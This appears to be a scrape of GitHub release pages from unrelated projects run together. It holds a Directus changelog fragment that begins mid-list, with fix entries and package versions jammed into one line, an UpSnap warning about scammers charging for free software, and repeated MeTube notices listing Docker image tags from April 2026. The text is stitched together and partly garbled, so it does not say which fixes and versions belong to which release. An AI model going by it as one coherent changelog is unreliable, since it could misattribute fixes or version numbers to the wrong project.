@directus/schema-builder dependency (#27166 by @ComfortablyCoding)VERSION_SAVE activity/revisions not respecting collection tracking settings (#27096 by @yogeshwaran-c)/ in name (#27114 by @costajohnt)directus_access junction collection (#27152 by @yogeshwaran-c)useShortcut attempting to access document before available (#27155 by @ComfortablyCoding)@directus/app@15.10.0@directus/api@35.2.0@directus/composables@11.4.1create-directus-extension@11.0.36@directus/env@5.8.0@directus/extensions@3.0.25@directus/extensions-registry@3.0.26@directus/extensions-sdk@17.1.4@directus/memory@3.1.8@directus/pressure@3.0.22@directus/schema-builder@0.0.20@directus/storage-driver-azure@12.0.22@directus/storage-driver-cloudinary@12.0.22@directus/storage-driver-gcs@12.0.22@directus/storage-driver-s3@12.1.8@directus/storage-driver-supabase@3.0.22@directus/themes@1.3.3@directus/types@15.0.3@directus/utils@13.4.1@directus/validation@2.0.23@directus/visual-editing@2.0.1@directus/sdk@21.3.0@directus/sandbox@0.0.0
Note
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.26GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.26
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.21GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.21
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.16GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.16
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.12GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.12
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.10GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.10
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.09GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.09
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.05GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.05
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.04GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.04
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.03GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.03
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.02GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.02
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.04.01GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.04.01
